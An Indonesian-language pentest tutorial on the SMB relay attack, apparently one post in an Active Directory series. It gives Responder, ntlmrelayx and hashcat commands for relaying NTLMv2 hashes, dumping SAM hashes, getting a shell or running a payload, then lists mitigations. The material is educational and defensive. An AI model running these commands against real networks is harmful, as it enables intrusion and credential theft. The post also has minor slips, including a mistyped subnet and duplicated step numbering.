Post

Part 5 - SMB Relay Attack

Tujuan

  • Get a foothold user

Prasyarat

  • SMB signing harus bisa tidak digunakan pada komputer target.
  • Kredensial user yang di-relay memiliki akses admin di komputer korban yang lainnya.
  • Penyerang satu jaringan dengan target.

Tools

  • Responder
  • Impacket
  • Hashcat

SMB Relay Attack

Serangan SMB relay adalah jenis serangan yang mengandalkan hash NTLMv2.

Dibandingkan meng-crack hash yang didapatkan dari Resonder, kita bisa me-relay hash ke komputer tertentu dan berpotensi mendapatkan akses.

Cara kerja smb relay attack

Tahap eksploitasi

Step 1: Pastikan semua prasyarat terpenuhi

Contoh topologi untuk melakukan smb relay attack

Dalam skenario kali ini, user Neira merupakan admin dari komputer 192.168.25.152 dan 192.168.25.152.

Step 2: Memeriksa apakah SMB signing diterapkan pada target

Penyerang melakukan pemeriksaan apakah SMB signing diterapkan pada target atau tidak.

1
➜ nmap --script=smb2-security-mode.nse -p445 192.68.25.0/24

Step 3: Jalankan responder

1
sudo responder -I eth0 -rdw 

Konfigurasi responder untuk layanan HTTP dan SMB dinonaktifkan. (/etc/responder/Responder.conf)

Step 3: Siapkan alat NTLM relay

Kita akan menargetkan 192.168.25.152 sebagai target pada saat me-relay NTLMv2 hash.

1
2
3
4
5
➜ ntlmrelayx.py -t 192.168.25.152 -smb2support
➜ ntlmrelayx.py -tf targets.txt -smb2support
➜ ntlmrelayx.py -tf targets.txt -smb2support -i # interactive
➜ ntlmrelayx.py -tf targets.txt -smb2support -e rev.exe # menjalankan file .exe
➜ ntlmrelayx.py -tf targets.txt -smb2support -c 'whoami' # run command

Step 4: Tunggu korban melakukan kesalahan

Ketika user Neira pada komputer 192.168.25.153 typo seperti pada bagian LLMNR poisoning.

Sebagai contoh, korban melakukan salah ketik, yaitu mengakses \\tidakada\ .

User melakukan kesalahan

Maka ntlmrelayx.py akan me-relay NTLMv2 hash yang didapatkan ke komputer target (192.168.25.152). Perintah default dari ntlmrelayx.py akan menadapatkan SAM hash dari komputer target

Mendapatkan SAM hash

Contoh lainnya ketika menjalankan mode interactive:

Interactive shell

Interactive shell

Step 5: Crack de hash (opsional)

SAM hash dapat di-crack menggunakan hashcat dengan perintah berikut:

1
➜ hashcat -m 1000 pass.hash /usr/share/wordlists/rockyou.txt 

Mitigasi

  • Aktifkan SMB signing pada semua perangkat:
    • Pro: Menghentikan sepenuhnya serangan ini.
    • Con: Dapat menyebabkan masalah kinerja pada salinan file yang besar.
  • Nonaktifkan otentikasi NTLM di jaringan
    • Pro: Menghentikan sepenuhnya serangan ini.
    • Con: Jika Kerberous berhenti bekerja, default Windows akan kembali menggunakan NTLM.
  • Account tiering:
    • Pro: Membatasi Domain Admins untuk tugas tertentu (misalnya, hanya masuk ke server yang memerlukan DA).
    • Con: Menegakkan kebijakannya mungkin sulit.
  • Local admin restriction:
    • Pro: Dapat mencegah banyak lateral movement.
    • Con: Bepotensi meningkatkan banyak tiket open support.

Referensi

This post is licensed under CC BY 4.0 by the author.